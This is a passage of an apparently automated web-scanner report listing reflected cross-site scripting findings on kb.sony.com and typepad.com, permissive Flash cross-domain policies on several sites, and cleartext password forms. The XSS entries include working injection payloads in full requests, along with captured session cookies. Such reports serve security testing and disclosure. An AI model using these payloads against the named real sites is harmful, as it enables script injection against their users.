GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC91bbd"-alert(1)-"f87f5c47280 &dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.315E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK/kanisa.css" type="text/css" rel="stylesheet">...[SNIP]... :80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC91bbd"-alert(1)-"f87f5c47280 &dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294";&highlight=off","");...[SNIP]...
1.42. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [dialogID parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the dialogID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9159"-alert(1)-"4a3c1582004 was submitted in the dialogID parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985c9159"-alert(1)-"4a3c1582004 &docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.315E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK/kanisa.css" type="text/css" rel="stylesheet">...[SNIP]... :80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985c9159"-alert(1)-"4a3c1582004 &docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294";&highlight=off","");...[SNIP]...
1.43. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docType parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the docType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b2e1"-alert(1)-"87e65d4c18e was submitted in the docType parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc4b2e1"-alert(1)-"87e65d4c18e &cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.315E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK/kanisa.css" type="text/css" rel="stylesheet">...[SNIP]... :80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc4b2e1"-alert(1)-"87e65d4c18e &cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294";&highlight=off","");...[SNIP]...
1.44. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docTypeID parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the docTypeID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9060"-alert(1)-"4496b4fc800 was submitted in the docTypeID parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1d9060"-alert(1)-"4496b4fc800 &stateId=1+0+328800294 HTTP/1.1/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.315E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK/kanisa.css" type="text/css" rel="stylesheet">...[SNIP]... :80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1d9060"-alert(1)-"4496b4fc800 &stateId=1+0+328800294";&highlight=off","");...[SNIP]...
1.45. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0b2e"-alert(1)-"8ea97393960 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294&f0b2e"-alert(1)-"8ea97393960 =1 HTTP/1.1/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.315E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK/kanisa.css" type="text/css" rel="stylesheet">...[SNIP]... :80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294&f0b2e"-alert(1)-"8ea97393960 =1";&highlight=off","");...[SNIP]...
1.46. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the sliceId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86b7a'%3balert(1)//5e4fc876c82 was submitted in the sliceId parameter. This input was echoed as 86b7a';alert(1)//5e4fc876c82 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_186b7a'%3balert(1)//5e4fc876c82 &docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848F34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 200 OK/kanisa.css" type="text/css" rel="stylesheet">...[SNIP]... .kb.sony.com:80/selfservice/dynamickc.do?cmd=show&forward=nonthreadedKC&docType=kc&externalId=${extId}&sliceId=pdfPage_186b7a';alert(1)//5e4fc876c82 ');.sony.com:80/selfservice/dynamickc.do?cmd=show&forward=nonthreadedKC&docType=kc&externalId=${extId}&sliceId=pdfPage_186b7a';alert(1)//5e...[SNIP]...
1.47. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the sliceId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d3ec"-alert(1)-"1b2827b41a1 was submitted in the sliceId parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_15d3ec"-alert(1)-"1b2827b41a1 &docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848F34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 200 OK/kanisa.css" type="text/css" rel="stylesheet">...[SNIP]... :80/selfservice/viewdocument.do?externalId=BNP1USESpdf&sliceId=pdfPage_15d3ec"-alert(1)-"1b2827b41a1 &docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848";&highlight=off","");...[SNIP]...
1.48. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [stateId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Header.jsp
Issue detail
The value of the stateId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8a7b"-alert(1)-"defc0e3e037 was submitted in the stateId parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294d8a7b"-alert(1)-"defc0e3e037 HTTP/1.1/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.315E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK/kanisa.css" type="text/css" rel="stylesheet">...[SNIP]... :80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294d8a7b"-alert(1)-"defc0e3e037 ";&highlight=off","");...[SNIP]...
1.49. http://www.typepad.com/services/toolbar [autofollowed parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.typepad.com
Path:
/services/toolbar
Issue detail
The value of the autofollowed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e142b%3balert(1)//db967658d0d was submitted in the autofollowed parameter. This input was echoed as e142b;alert(1)//db967658d0d in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/toolbar?blog_id=6a010535f33a5b970c010535ecb398970b&asset_id=&atype=index&to=http%3A%2F%2Fblog.proofpoint.com%2F&autofollowed=0e142b%3balert(1)//db967658d0d &safe_to_modify_body=0 HTTP/1.1.com//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.0 200 OK-language,Accept-Encoding/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" xmlns:at="http://www.sixapart.c...[SNIP]... e142b;alert(1)//db967658d0d ,...[SNIP]...
2. Flash cross-domain policy
previous
next
There are 4 instances of this issue:
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
2.1. http://www.viddler.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.viddler.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.0
Response
HTTP/1.1 200 OK* "/>
2.2. http://blog.trendmicro.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.0
Response
HTTP/1.0 200 OK".com/xml/dtds/cross-domain-policy.dtd">*.trendmicro.de ...[SNIP]... *.rocket-media.info ...[SNIP]...
2.3. http://wd.sharethis.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://wd.sharethis.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.0
Response
HTTP/1.1 200 OK/dtds/cross-domain-policy.dtd">-policies="master-only" ...[SNIP]... *.meandmybadself.com *.sharethis.com " />...[SNIP]...
2.4. http://www.typepad.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.typepad.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Request
GET /crossdomain.xml HTTP/1.0
Response
HTTP/1.0 200 OK.com/xml/dtds/cross-domain-policy.dtd">static.typepad.com " />...[SNIP]... *.sixapart.com *.videoegg.com *.saymedia.com ...[SNIP]...
3. Cleartext submission of password
previous
next
There are 3 instances of this issue:
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
3.1. http://webconnect.sendouts.com/login.aspx
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://webconnect.sendouts.com
Path:
/login.aspx
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://webconnect.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=
Request
GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1.sendouts.com/CN_main.aspx?key=cn&id=cfs/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form name="WebForm1" method="post" action="login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=" onsubmit="javascript:return WebForm_OnSubmit();" id="WebForm1"> ...[SNIP]... <input name="txtPassword" type="password" id="txtPassword" /> <span id="RequiredFieldValidator2" class="ErrorMsg" style="color:Red;display:none;">...[SNIP]...
3.2. http://www.javalobby.org/articles/acegisecurity/part1.jsp
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/articles/acegisecurity/part1.jsp
Issue detail
